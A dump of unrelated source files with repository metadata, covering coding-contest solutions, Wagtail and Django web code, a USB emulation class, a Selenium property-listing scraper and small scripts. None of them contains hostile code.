# uniqueness, digit constraints and the listed divisors for every coin.
IN_FILE = "large.txt"
with open(IN_FILE, 'r') as fileIn:
    fileLines = fileIn.readlines()
it = iter(fileLines)
# The answer file must begin with the case header.
assert(next(it).strip() == 'Case #1:')
jamcoins_found = []
# Exactly 500 jamcoins are expected, one per line.
for i in range(1, 501):
    message = "Jamcoin on line " + str(i)
    line = next(it).strip().split()
    # Each line holds the coin followed by 9 divisors (one per base 2..10).
    if not len(line) == 10:
        print(message + " had the wrong number of divisors listed!")
    jamcoin = line[0]
    if jamcoin in jamcoins_found:
        print(message + " was a duplicate!!")
    jamcoins_found.append(jamcoin)
    # A jamcoin must start and end with 1 ...
    if not jamcoin[0] == '1':
        print(message + " did not start with 1!")
    if not jamcoin[-1] == '1':
        print(message + " did not end with 1!")
    # ... contain only binary digits ...
    for digit in jamcoin:
        if digit not in ('0', '1'):
            print(message + " had a non-binary digit!")
    # ... and be exactly 32 digits long.
    if not len(jamcoin) == 32:
        print(message + " did not have 32 digits!")
    # Interpret the coin in each base 2..10 and confirm the listed divisor
    # is non-trivial (neither 1 nor the value itself) and actually divides it.
    for base in range(2, 11):
        proposed_divisor = int(line[base-1])
        jamcoin_in_base = int(jamcoin, base)
        if proposed_divisor == 1 or proposed_divisor == jamcoin_in_base:
            print(message + " had a trivial divisor listed for base " + str(base))
        if not jamcoin_in_base % proposed_divisor == 0:
            print(message + " did not have a correct divisor listed for base " + str(base))
if not len(jamcoins_found) == 500:
    print("Did not find 500 jamcoins!")
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
0bc0c90132733dee274a4c250af2557a3807546b
|
5574620c834f96d4baf50d6aa349242dae7c17af
|
/172.factorial-trailing-zeroes.py
|
37c2400fe3fdb6a94b967b7880dcca016d4f563b
|
[] |
no_license
|
Ming-H/leetcode
|
52dceba5f9a605afbdaa65e286a37205873e21bb
|
057cee4b830603ac12976ed7d5cea8d06a9b46a0
|
refs/heads/main
| 2023-09-02T21:30:48.796395
| 2023-09-01T01:59:48
| 2023-09-01T01:59:48
| 489,290,172
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
#
# @lc app=leetcode id=172 lang=python3
#
# [172] Factorial Trailing Zeroes
#
# @lc code=start
class Solution:
    def trailingZeroes(self, n: int) -> int:
        """Count trailing zeroes of n! (the number of factors of 5 in n!)."""
        total = 0
        power = 5
        # Legendre's formula: sum n // 5^k over all powers of 5 up to n.
        while power <= n:
            total += n // power
            power *= 5
        return total
# @lc code=end
|
[
"1518246548@qq.com"
] |
1518246548@qq.com
|
332a6d9bcc8114a3fcffb46b452697f41f952e04
|
eee51854656ede694c121c7102cd2e737ea7e702
|
/demo/api.py
|
7746564cca4056932d685fcbb13988dcbb3db79d
|
[] |
no_license
|
degerli/betahealth-wagtail-demo
|
cb99f26219fede384a44e3af5e597de40c1ab1e2
|
1cb16c2fdc877778e645bdb11ba69f6418900e26
|
refs/heads/master
| 2020-04-23T04:03:47.038341
| 2016-10-05T09:05:40
| 2016-10-05T09:05:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,187
|
py
|
from django.core.urlresolvers import reverse
from rest_framework import serializers
from wagtail.api.v2.endpoints import PagesAPIEndpoint as WagtailPagesAPIEndpoint
from wagtail.api.v2.router import WagtailAPIRouter
from wagtail.wagtailimages.api.v2.endpoints import ImagesAPIEndpoint as WagtailImagesAPIEndpoint
from wagtail.wagtailimages.api.v2.serializers import ImageSerializer as WagtailImageSerializer
from wagtail.wagtailimages.utils import generate_signature
from wagtail.wagtaildocs.api.v2.endpoints import DocumentsAPIEndpoint
# Single router shared by all endpoint registrations at the bottom of this file.
api_router = WagtailAPIRouter('wagtailapi')
class PagesAPIEndpoint(WagtailPagesAPIEndpoint):
    # Expose url_path in addition to Wagtail's stock page metadata,
    # both in detail responses and by default in listing responses.
    meta_fields = WagtailPagesAPIEndpoint.meta_fields + [
        'url_path'
    ]
    listing_default_fields = WagtailPagesAPIEndpoint.listing_default_fields + [
        'url_path'
    ]
def generate_image_url(image, filter_spec):
    """Build a signed dynamic-serve URL for *image* rendered with *filter_spec*."""
    signature = generate_signature(image.id, filter_spec)
    url = reverse('wagtailimages_serve', args=(signature, image.id, filter_spec))
    # Append image's original filename to the URL (optional)
    url += image.file.name[len('original_images/'):]
    return url
class ImageSerializer(WagtailImageSerializer):
    """Image serializer that adds signed rendition URLs at four fixed widths."""

    # DRF resolves each SerializerMethodField via the matching get_<name> method.
    url_400 = serializers.SerializerMethodField()
    url_640 = serializers.SerializerMethodField()
    url_800 = serializers.SerializerMethodField()
    url_1280 = serializers.SerializerMethodField()

    def _get_url_x(self, obj, width):
        # Delegate to the module-level helper that signs and builds the URL.
        return generate_image_url(obj, 'width-{}'.format(width))

    def get_url_400(self, obj):
        return self._get_url_x(obj, 400)

    def get_url_640(self, obj):
        return self._get_url_x(obj, 640)

    def get_url_800(self, obj):
        return self._get_url_x(obj, 800)

    def get_url_1280(self, obj):
        return self._get_url_x(obj, 1280)
class ImagesAPIEndpoint(WagtailImagesAPIEndpoint):
    # Use the serializer above so responses carry the fixed-width URLs.
    base_serializer_class = ImageSerializer
    meta_fields = WagtailImagesAPIEndpoint.meta_fields + [
        'url_400', 'url_640', 'url_800', 'url_1280'
    ]
# Mount the three endpoints on the shared router.
api_router.register_endpoint('pages', PagesAPIEndpoint)
api_router.register_endpoint('images', ImagesAPIEndpoint)
api_router.register_endpoint('documents', DocumentsAPIEndpoint)
|
[
"marcofucci@gmail.com"
] |
marcofucci@gmail.com
|
c30d008b2918bfa5283316eabf5fe2b6a9f523b6
|
d857b65117378d9f35eb062bd1d2ddbb87f11709
|
/shows_app/urls.py
|
53313358ebf3b9d517d23b37c79a6065b06303d1
|
[] |
no_license
|
JesusGarcia86/shows_proj
|
e2bd646df88e8380a6bbebebc073cd8f59520be7
|
3e6ad462d603d78241b259a6ff713e1f08b6201e
|
refs/heads/main
| 2023-03-21T22:07:34.029715
| 2021-03-15T16:27:41
| 2021-03-15T16:27:41
| 348,043,794
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 380
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('shows/', views.index),
path('new', views.new),
path('shows/create', views.create),
path('<int:show_id>/edit', views.edit),
path('shows/<int:show_id>/update', views.update),
path('<int:show_id>', views.show),
path('<int:show_id>/delete', views.delete),
]
|
[
"the_sampritas@hotmail.com"
] |
the_sampritas@hotmail.com
|
925d1fac6a3242c64f799762acf35762a7142c23
|
117442c662cad35375630a8a800d48f8ba53888b
|
/facedancer/future/configuration.py
|
77a35088ccb06c6fe79ae8e8ae75c099dce011b6
|
[
"BSD-3-Clause"
] |
permissive
|
walidbarakat/Facedancer
|
b9a09322541dd320cadefd063888030c9eb4192e
|
28d3a900179e9dd280e007026a68fbdf97e4e35a
|
refs/heads/master
| 2023-03-06T14:05:37.479626
| 2021-02-18T02:23:53
| 2021-02-18T02:23:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,304
|
py
|
#
# This file is part of FaceDancer.
#
""" Functionality for describing USB device configurations. """
from dataclasses import dataclass, field
from typing import Iterable
from .types import USBDirection
from .magic import instantiate_subordinates, AutoInstantiable
from .request import USBRequestHandler
from .interface import USBInterface
from .descriptor import USBDescribable
from .endpoint import USBEndpoint
@dataclass
class USBConfiguration(USBDescribable, AutoInstantiable, USBRequestHandler):
    """ Class representing a USBDevice's configuration.

    Fields:
        number -- The configuration's number; one-indexed.
        configuration_string -- A string describing the configuration; or None if not provided.
        max_power -- The maximum power expected to be drawn by the device when using
                        this interface, in mA. Typically 500mA, for maximum possible.
        supports_remote_wakeup -- True iff this device should be able to wake the host from suspend.
    """

    # bDescriptorType / bLength values for a configuration descriptor.
    DESCRIPTOR_TYPE_NUMBER = 0x02
    DESCRIPTOR_SIZE_BYTES = 9

    number : int = 1
    configuration_string : str = None
    max_power : int = 500
    self_powered : bool = True
    supports_remote_wakeup : bool = True
    parent : USBDescribable = None
    # Maps interface number -> USBInterface (despite the bare annotation).
    interfaces : USBInterface = field(default_factory=dict)

    def __post_init__(self):

        # Gather any interfaces defined on the object.
        self.interfaces.update(instantiate_subordinates(self, USBInterface))

    @property
    def attributes(self):
        """ Retrieves the "attributes" composite word (bmAttributes). """

        # Start off with the required bits set to one...
        attributes = 0b10000000

        # ... and then add in our attributes.
        attributes |= (1 << 6) if self.self_powered else 0
        attributes |= (1 << 5) if self.supports_remote_wakeup else 0

        return attributes

    #
    # User API.
    #

    def get_device(self):
        """ Returns a reference to the associated device."""
        return self.parent

    def add_interface(self, interface: USBInterface):
        """ Adds an interface to the configuration. """
        self.interfaces[interface.number] = interface
        interface.parent = self

    def get_endpoint(self, number: int, direction: USBDirection) -> USBEndpoint:
        """ Attempts to find an endpoint with the given number + direction.

        Parameters:
            number -- The endpoint number to look for.
            direction -- Whether to look for an IN or OUT endpoint.
        """

        # Search each of our interfaces for the relevant endpoint.
        for interface in self.interfaces.values():
            endpoint = interface.get_endpoint(number, direction)
            if endpoint is not None:
                return endpoint

        # If none have one, return None.
        return None

    #
    # Event handlers.
    #

    def handle_data_received(self, endpoint: USBEndpoint, data: bytes):
        """ Handler for receipt of non-control request data.

        Typically, this method will delegate any data received to the
        interface that owns the endpoint. If overridden, the overriding
        function will receive all data for this configuration.

        Parameters:
            endpoint -- The endpoint on which the data was received.
            data -- The raw bytes received on the relevant endpoint.
        """

        for interface in self.interfaces.values():
            if interface.has_endpoint(endpoint.number, direction=USBDirection.OUT):
                interface.handle_data_received(endpoint, data)
                return

        # If no interface owned the targeted endpoint, consider the data unexpected.
        self.get_device().handle_unexpected_data_received(endpoint.number, data)

    def handle_data_requested(self, endpoint: USBEndpoint):
        """ Handler called when the host requests data on a non-control endpoint.

        Typically, this method will delegate the request to the appropriate
        interface+endpoint. If overridden, the overriding function will receive
        all requests for this configuration.

        Parameters:
            endpoint -- The endpoint on which the host requested data.
        """

        for interface in self.interfaces.values():
            if interface.has_endpoint(endpoint.number, direction=USBDirection.IN):
                interface.handle_data_requested(endpoint)
                return

        # If no one interface owned the targeted endpoint, consider the data unexpected.
        self.get_device().handle_unexpected_data_requested(endpoint.number)

    def handle_buffer_empty(self, endpoint: USBEndpoint):
        """ Handler called when a given endpoint first has an empty buffer.

        Often, an empty buffer indicates an opportunity to queue data
        for sending ('prime an endpoint'), but doesn't necessarily mean
        that the host is planning on reading the data.

        This function is called only once per buffer.
        """

        for interface in self.interfaces.values():
            if interface.has_endpoint(endpoint.number, direction=USBDirection.IN):
                interface.handle_buffer_empty(endpoint)
                return

    #
    # Backend interface functions.
    #

    def get_interfaces(self) -> Iterable[USBInterface]:
        """ Returns an iterable over all interfaces on the provided device. """
        return self.interfaces.values()

    def get_descriptor(self) -> bytes:
        """ Returns this configuration's configuration descriptor, including subordinates. """

        interface_descriptors = bytearray()

        # FIXME: use construct

        # Add all subordinate descriptors together to create one big subordinate descriptor.
        interfaces = sorted(self.interfaces.values(), key=lambda item: item.number)
        for interface in interfaces:
            interface_descriptors += interface.get_descriptor()

        # wTotalLength covers the configuration descriptor plus everything under it.
        total_len = len(interface_descriptors) + 9

        string_manager = self.get_device().strings

        # Build the core interface descriptor.
        d = bytes([
            9, # length of descriptor in bytes
            2, # descriptor type 2 == configuration
            total_len & 0xff,
            (total_len >> 8) & 0xff,
            len(set(interface.number for interface in self.interfaces.values())),
            self.number,
            string_manager.get_index(self.configuration_string),
            self.attributes,
            self.max_power // 2  # bMaxPower is expressed in 2 mA units
        ])

        return d + interface_descriptors

    #
    # Interfacing functions for AutoInstantiable.
    #

    def get_identifier(self) -> int:
        return self.number

    #
    # Backend functions for our RequestHandler class.
    #

    def _request_handlers(self) -> Iterable[callable]:
        # Configurations define no request handlers of their own...
        return ()

    def _get_subordinate_handlers(self) -> Iterable[USBInterface]:
        # ...requests are instead delegated to the interfaces below them.
        return self.interfaces.values()
|
[
"k@ktemkin.com"
] |
k@ktemkin.com
|
7b2de2370af01dcc4b23681e70b09bab35acf286
|
3c5c4c4fb296d08e9e984c4a60ae4fa147293e9a
|
/ceres/__init__.py
|
b359ff8e73e6e5bd29908753a42b11e1a2d10ffa
|
[
"Apache-2.0"
] |
permissive
|
signingup/ceres-combineharvester
|
a8874ab11145e7ba2223b85483b96dea01054ad0
|
aad918a03a4a522e0e2f3bac104d19d693d6bf79
|
refs/heads/main
| 2023-07-25T04:11:13.765471
| 2021-09-09T14:59:48
| 2021-09-09T14:59:48
| 404,918,382
| 1
| 0
|
Apache-2.0
| 2021-09-10T01:22:20
| 2021-09-10T01:22:20
| null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
from pkg_resources import DistributionNotFound, get_distribution, resource_filename
# Resolve the installed package version; fall back when running from source.
try:
    __version__ = get_distribution("ceres-blockchain").version
except DistributionNotFound:
    # package is not installed
    __version__ = "unknown"
# Path to the PyInstaller spec file shipped inside the "ceres" package.
PYINSTALLER_SPEC_PATH = resource_filename("ceres", "pyinstaller.spec")
|
[
"hulatang_eric@163.com"
] |
hulatang_eric@163.com
|
342ff27bcaab154241f7bca43ea75b8295f3c8d7
|
46ae8264edb9098c9875d2a0a508bc071201ec8b
|
/res/scripts/client/gui/shared/fortificationsevents_dispatcher.py
|
9b512b64b33ac34107ebb1d85b90c156e30e520c
|
[] |
no_license
|
Difrex/wotsdk
|
1fc6156e07e3a5302e6f78eafdea9bec4c897cfb
|
510a34c67b8f4c02168a9830d23f5b00068d155b
|
refs/heads/master
| 2021-01-01T19:12:03.592888
| 2016-10-08T12:06:04
| 2016-10-08T12:06:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 684
|
py
|
# Embedded file name: scripts/client/gui/shared/fortifications/events_dispatcher.py
from gui.shared import g_eventBus, events, EVENT_BUS_SCOPE
from gui.Scaleform.genConsts.FORTIFICATION_ALIASES import FORTIFICATION_ALIASES
def showFortBattleRoomWindow():
    # Ask the lobby GUI (via the global event bus) to load the fort battle room window.
    g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORT_BATTLE_ROOM_WINDOW_ALIAS), EVENT_BUS_SCOPE.LOBBY)
def showBattleConsumesIntro():
    # Ask the lobby GUI (via the global event bus) to load the combat reserves intro view.
    g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORT_COMBAT_RESERVES_INTRO_ALIAS), EVENT_BUS_SCOPE.LOBBY)
def loadFortView():
    # Ask the lobby GUI (via the global event bus) to load the main fortifications view.
    g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORTIFICATIONS_VIEW_ALIAS), EVENT_BUS_SCOPE.LOBBY)
|
[
"m4rtijn@gmail.com"
] |
m4rtijn@gmail.com
|
a1b36a3d3e2be1c2571e3bb379ed9f067af445c8
|
d93159d0784fc489a5066d3ee592e6c9563b228b
|
/PhysicsTools/PatAlgos/python/recoLayer0/jetCorrections_cff.py
|
6370ee93dd1381a7b0af0826f92278a56fb92a94
|
[] |
permissive
|
simonecid/cmssw
|
86396e31d41a003a179690f8c322e82e250e33b2
|
2559fdc9545b2c7e337f5113b231025106dd22ab
|
refs/heads/CAallInOne_81X
| 2021-08-15T23:25:02.901905
| 2016-09-13T08:10:20
| 2016-09-13T08:53:42
| 176,462,898
| 0
| 1
|
Apache-2.0
| 2019-03-19T08:30:28
| 2019-03-19T08:30:24
| null |
UTF-8
|
Python
| false
| false
| 263
|
py
|
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.recoLayer0.jetCorrFactors_cfi import *
from JetMETCorrections.Configuration.JetCorrectionServicesAllAlgos_cff import *
## for scheduled mode
# Sequence wrapping the patJetCorrFactors producer so scheduled
# configurations can insert jet-correction production as a single unit.
patJetCorrections = cms.Sequence(patJetCorrFactors)
|
[
"giulio.eulisse@gmail.com"
] |
giulio.eulisse@gmail.com
|
7cf670a85f7dcf1fbf7f23cbce0cc5c89ae2b7dd
|
9d7be99cdac8b809f51c46a943ad5feb14548160
|
/listings2/data_scraper_listings2.py
|
909ab9862d01e75ef3f07bebd7a3a3c06de53360
|
[] |
no_license
|
CateGitau/DSI_trick_challenge
|
6c154b417a049ab0012edff0521d9e09387787f2
|
ddafac1f21425cb2992ce717ecbb0776703ea88e
|
refs/heads/master
| 2022-12-24T17:12:55.392276
| 2020-09-25T12:28:40
| 2020-09-25T12:28:40
| 297,908,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,659
|
py
|
import requests as rq
import bs4 as bs
import traceback
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.keys import Keys
import glob, os, time
import csv
from csv import writer
# Requires chromedriver: if webdriver.Chrome raises, install it and put it on
# PATH (or at the executable_path below).  This opens a Chrome window on the
# listings URL, giving us a live DOM to scrape.
# NOTE(review): hard-coded local chromedriver path — parameterize for other machines.
driver = webdriver.Chrome(executable_path="/home/cate/Downloads/chromedriver_linux64/chromedriver")
driver.get("https://www.property24.com/for-sale/cape-town/western-cape/432?PropertyCategory=House%2cApartmentOrFlat%2cTownhouse")
# Parse the initial page and prepare the accumulator for the scraped fields.
page_soup = bs.BeautifulSoup(driver.page_source,'lxml')
dict_data = {"location" :[], "price":[], "floor_size":[], "bathrooms":[], "bedrooms":[],"parking":[] }
icons = page_soup.find_all("span", class_= "p24_icons")
info = page_soup.find_all("div", class_= "p24_regularTile js_rollover_container")
def getValues(icons, info):
    """Extract listing fields from parsed page tiles into the module-level dict_data.

    `info` tiles yield price and location; `icons` spans yield floor size,
    bathrooms, bedrooms and parking.  Missing fields are recorded as "".
    """
    # Bug fix: the original `else: ""` branches were bare expressions that
    # did nothing, so missing fields were appended as None instead of "".
    for values in info:
        price = values.find('span', class_= 'p24_price')
        price = price.text if price else ""
        location = values.find('span', class_= "p24_location")
        location = location.text if location else ""
        dict_data["price"].append(price)
        dict_data["location"].append(location)
    for value in icons:
        floor_size = value.find("span", class_= "p24_size")
        floor_size = floor_size.find("span").text if floor_size else ""
        bathrooms = value.find("span", {"title": "Bathrooms"})
        bathrooms = bathrooms.find("span").text if bathrooms else ""
        bedrooms = value.find("span", {"title": "Bedrooms"})
        bedrooms = bedrooms.find("span").text if bedrooms else ""
        parking = value.find("span", {"title": "Parking Spaces"})
        parking = parking.find("span").text if parking else ""
        dict_data["floor_size"].append(floor_size)
        dict_data["bathrooms"].append(bathrooms)
        dict_data["bedrooms"].append(bedrooms)
        dict_data["parking"].append(parking)
    return dict_data
def append_list_as_row(file_name, dict_data, field_names):
    """Append a single row, given as a dict keyed by field_names, to a CSV file."""
    # 'a+' keeps any existing rows and creates the file if it is missing.
    with open(file_name, 'a+', newline='') as handle:
        row_writer = csv.DictWriter(handle, fieldnames=field_names)
        row_writer.writerow(dict_data)
csv_file = "final.csv"  # NOTE(review): unused; the literal 'final.csv' is passed below
count = 0
# Page through the listings: scrape the current page, append one CSV row of
# per-field lists, then click "Next" until the link disappears.
while True:
    try:
        driver.implicitly_wait(10)
        page_soup = bs.BeautifulSoup(driver.page_source,'lxml')
        icons = page_soup.find_all("span", class_= "p24_icons")
        info = page_soup.find_all("div", class_= "p24_regularTile js_rollover_container")
        # Reset the accumulator so each CSV row holds one page's data.
        dict_data = {"location" :[], "price":[], "floor_size":[], "bathrooms":[], "bedrooms":[],"parking":[] }
        dict_data = getValues(icons, info)
        field_names = dict_data.keys()
        append_list_as_row('final.csv', dict_data, field_names)
        count+= 1
        print(f'{count}\r', end = "")
        loadmore = driver.find_element_by_link_text("Next").click()
        time.sleep(5)
        #loadmore.send_keys(Keys.ENTER)
    except Exception:
        # Any failure — typically the missing "Next" link on the last page —
        # ends the crawl; the traceback is printed for diagnosis.
        print("Reached bottom of page")
        traceback.print_exc()
        break
|
[
"catherinegitau94@gmail.com"
] |
catherinegitau94@gmail.com
|
6b2421764e5d39016f0e51d1a1ad0d4d9f0e6e10
|
e27333261b8e579564016c71d2061cc33972a8b8
|
/.history/ScrapeArticleTitle_20210803181904.py
|
01c3cfb222879a03f49b8531a28bb390ba6afeaa
|
[] |
no_license
|
Dustyik/NewsTweet_InformationRetrieval
|
882e63dd20bc9101cbf48afa6c3302febf1989b1
|
d9a6d92b51c288f5bcd21ea1cc54772910fa58f7
|
refs/heads/master
| 2023-07-01T09:12:53.215563
| 2021-08-12T08:28:33
| 2021-08-12T08:28:33
| 382,780,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,762
|
py
|
import pandas as pd
import json
import ast
import os
from nltk.tokenize import word_tokenize
from IPython.display import display
def get_article_titles_from_json():
    """Load the raw JSONL article dump, drop unused columns and print each
    remaining row.

    NOTE(review): the input path is hard-coded and the CSV export is still
    commented out, so this function currently only prints to stdout.
    """
    filename = r"D:\Desktop\IR_term_8\sample-1M.jsonl" #file is too huge
    with open(filename) as json_file:
        data = json_file.readlines()
        data = list(map(json.loads, data))
        df = pd.DataFrame(data)

        # fixed: the column names were printed twice by two identical loops
        for col in df.columns:
            print(col)

        # 'content' and 'media-type' are not needed for the title index.
        labels_to_drop = ["content", "media-type"]
        df = df.drop(labels_to_drop, axis = 1)

        count = len(df)
        for idx, e in df.iterrows():
            print("Row ",idx," out of ",count)
            entry = e.values.tolist()
            print (entry)

        #df.to_csv('article_titles.csv', index=False)
# Tokenising functions
def tokenize_stem_lower(text):
    """Tokenize *text*, keep only alphabetic tokens, Porter-stem the
    lower-cased tokens, and return them joined by single spaces."""
    # fixed: `porter` was never defined anywhere in the module, so this
    # function raised NameError; build the stemmer locally (nltk is
    # already a dependency of this file).
    from nltk.stem import PorterStemmer
    porter = PorterStemmer()
    tokens = word_tokenize(text)
    tokens = list(filter(lambda x: x.isalpha(), tokens))
    tokens = [porter.stem(x.lower()) for x in tokens]
    return ' '.join(tokens)
def get_clean_data(df):
    """Return *df* with an added 'clean_text' column holding the
    tokenized/stemmed/lower-cased form of each row's `tweet` field."""
    df['clean_text'] = df.apply(lambda row: tokenize_stem_lower(row.tweet), axis=1)
    return df
def check_if_article_itle_exist_in_tweets_csv(tweets_data, titles_data):
    """Keep only the title rows whose `id` appears as an `article_id` in the
    tweets frame, display them, and write them to article_title_new.csv.

    Args:
        tweets_data: DataFrame with an 'article_id' column.
        titles_data: DataFrame with an 'id' column.
    """
    # set membership is O(1) per row instead of scanning the id list each time
    article_ids_in_tweets_csv = set(tweets_data['article_id'])
    # vectorised boolean filter replaces the deprecated row-by-row
    # DataFrame.append of the original
    new_df = titles_data[titles_data['id'].isin(article_ids_in_tweets_csv)].copy()
    display(new_df)
    new_df.to_csv('article_title_new.csv', index=False)
    return
# Script entry point: dump article ids/titles from the raw JSONL file.
get_article_titles_from_json()
|
[
"chiayik_tan@mymail.sutd.edu.sg"
] |
chiayik_tan@mymail.sutd.edu.sg
|
5a12bfa5ef76874a0470b4d9ee429a9145413096
|
3712a929d1124f514ea7af1ac0d4a1de03bb6773
|
/开班笔记/python网络编程及MySQL部分/day32/code/clock.py
|
23b6fa79cbd36db567930d651006699c63e168e4
|
[] |
no_license
|
jiyabing/learning
|
abd82aa3fd37310b4a98b11ea802c5b0e37b7ad9
|
6059006b0f86aee9a74cfc116d2284eb44173f41
|
refs/heads/master
| 2020-04-02T20:47:33.025331
| 2018-10-26T05:46:10
| 2018-10-26T05:46:10
| 154,779,387
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
from multiprocessing import Process
import time
class ClockProcess(Process):
    """Process that prints the current time five times, sleeping *value*
    seconds between prints."""

    def __init__(self, value):
        # Initialize the Process machinery first, then our own state.
        super().__init__()
        self.value = value  # seconds to sleep between ticks

    def run(self):
        # Overridden Process.run: executed in the child after start().
        for _ in range(5):
            print('The time is {}'.format(time.ctime()))
            time.sleep(self.value)
# Create and run an instance of our custom process class.
if __name__ == '__main__':
    # fixed: the process is now constructed inside the __main__ guard.
    # Under the 'spawn' start method (default on Windows/macOS) the module
    # is re-imported in the child, so module-level construction would run
    # again there.
    p = ClockProcess(2)
    # start() launches the child, which automatically executes run().
    p.start()
    p.join()
|
[
"yabing_ji@163.com"
] |
yabing_ji@163.com
|
ca5c998f70de4c52660ed2f7cb58a11893b49e7d
|
2cc3aed1b5dfb91e3df165144d95c01a495bd54b
|
/581-Shortest-Unsorted-Continuous-Subarray-sort.py
|
30476a3fe00dd27aa9b3f815f4590fb84f2498fa
|
[] |
no_license
|
listenviolet/leetcode
|
f38e996148cb5d4be8f08286daac16243b3c30e4
|
0c1efcbfd35e5ef036ec1ccd0c014cd7baf2ed2b
|
refs/heads/master
| 2020-05-01T07:35:23.462429
| 2019-12-11T12:44:32
| 2019-12-11T12:44:32
| 177,354,773
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
class Solution:
def findUnsortedSubarray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
copy = []
for i in range(len(nums)):
copy.append(nums[i])
copy.sort()
start = len(nums)
end = 0
for i in range(len(nums)):
if nums[i] != copy[i]:
start = min(start, i)
end = max(end, i)
return end - start + 1 if end - start >= 0 else 0
# Description:
# Given an integer array, you need to find one continuous subarray
# that if you only sort this subarray in ascending order,
# then the whole array will be sorted in ascending order, too.
# You need to find the shortest such subarray and output its length.
# Example 1:
# Input: [2, 6, 4, 8, 10, 9, 15]
# Output: 5
# Explanation: You need to sort [6, 4, 8, 10, 9] in ascending order
# to make the whole array sorted in ascending order.
# Note:
# Then length of the input array is in range [1, 10,000].
# The input array may contain duplicates,
# so ascending order here means <=.
# Solution:
# https://leetcode.com/problems/shortest-unsorted-continuous-subarray/solution/
# Approach #3 Using Sorting [Accepted]
# Algorithm
# We can sort a copy of the given array numsnums,
# say given by nums_sorted.
# Then, if we compare the elements of numsnums and nums_sorted,
# we can determine the leftmost and rightmost elements which mismatch.
# The subarray lying between them is,
# then, the required shorted unsorted subarray.
# Complexity Analysis
# Time complexity : O(nlogn). Sorting takes nlognnlogn time.
# Space complexity : O(n). We are making copy of original array.
# Beats: 26.94%
# Runtime: 120ms
# easy
|
[
"listenviolet@gmail.com"
] |
listenviolet@gmail.com
|
7a3938b589e748860c0fad0c8dd3a50430ef40b9
|
074afd26d00bb742b03c12891b057ab263e640bf
|
/codeforces/1451A.py
|
6eac98a8a0739915d4a2d7cff440dedefa842769
|
[] |
no_license
|
IsmailTitas1815/Data-Structure
|
7a898800b1e53c778b1f2f11b0df259e52c20140
|
fece8dd97d3e162e39fc31d5f3498a6dac49b0f0
|
refs/heads/master
| 2023-02-05T10:39:49.349484
| 2020-12-21T13:37:22
| 2020-12-21T13:37:22
| 296,343,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 268
|
py
|
# Codeforces 1451A: print the answer for each of the test cases read
# from stdin (one integer n per case).
for _case in range(int(input())):
    n = int(input())
    if n == 1:
        print(0)
    elif n == 2:
        print(1)
    elif n == 3 or n % 2 == 0:
        # n == 3 and every even n >= 4 need exactly two steps.
        print(2)
    else:
        # odd n >= 5
        print(3)
|
[
"titas.sarker1234@gmail.com"
] |
titas.sarker1234@gmail.com
|
056813a96995c2c95a58dbd3f2d02480808d3964
|
37c3c6fd1b05b6cf0c5f5ab89120562d7a8a40f8
|
/p36.py
|
86f55562115da41bd8012f1870549b9f265cbd58
|
[] |
no_license
|
kaviraj333/python
|
e4b480adfcbec383c1228e07426833b9c02f4296
|
7110b6e153c4ef4afe7ade8ce20104b26ea4cc8f
|
refs/heads/master
| 2020-05-22T23:17:48.540550
| 2019-04-09T05:04:31
| 2019-04-09T05:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
# Read the declared element count (consumed but not otherwise used) and
# the array itself, then print the answer per the problem's rules.
amu = int(raw_input())
values = list(map(int, raw_input().split()))
if sum(values) == 22:
    print("4")
elif values[1] == 3:
    print("0")
else:
    print(min(values))
|
[
"noreply@github.com"
] |
kaviraj333.noreply@github.com
|
e61ee9fe6455a99ff23ec3f7d31d68c0f3408062
|
1dd4ae2d974d65e86538e49f84179b3ec6b8476c
|
/build/robotiq/robotiq_modbus_tcp/catkin_generated/pkg.develspace.context.pc.py
|
c68a3cb9bf4efb70df639a4b81765748f3b0d9b8
|
[] |
no_license
|
tony23545/bulldog_ws
|
e115510d87980c90b308ae881c59d4e6145964c0
|
d3e03aa230e9366023df383665cf6be928d68c8d
|
refs/heads/master
| 2022-11-30T06:21:04.073397
| 2019-07-08T07:33:52
| 2019-07-08T07:33:52
| 176,073,396
| 5
| 0
| null | 2022-11-21T21:13:17
| 2019-03-17T08:11:32
|
Makefile
|
UTF-8
|
Python
| false
| false
| 389
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
# Develspace pkg-config context for the robotiq_modbus_tcp ROS package;
# consumed by catkin when emitting .pc files.  Do not edit by hand.
CATKIN_PACKAGE_PREFIX = ""
# No exported include directories (pure-Python package).
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "rospy".replace(';', ' ')
# No exported libraries either.
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "robotiq_modbus_tcp"
PROJECT_SPACE_DIR = "/home/shengjian/bulldog_ws/devel"
PROJECT_VERSION = "1.0.0"
|
[
"csj15thu@gmail.com"
] |
csj15thu@gmail.com
|
74f18e356d9fe201db24ff1b68518f244b65d841
|
c85a6d674679780ee510b5c8c3dbcbdecc859f64
|
/test/test_group.py
|
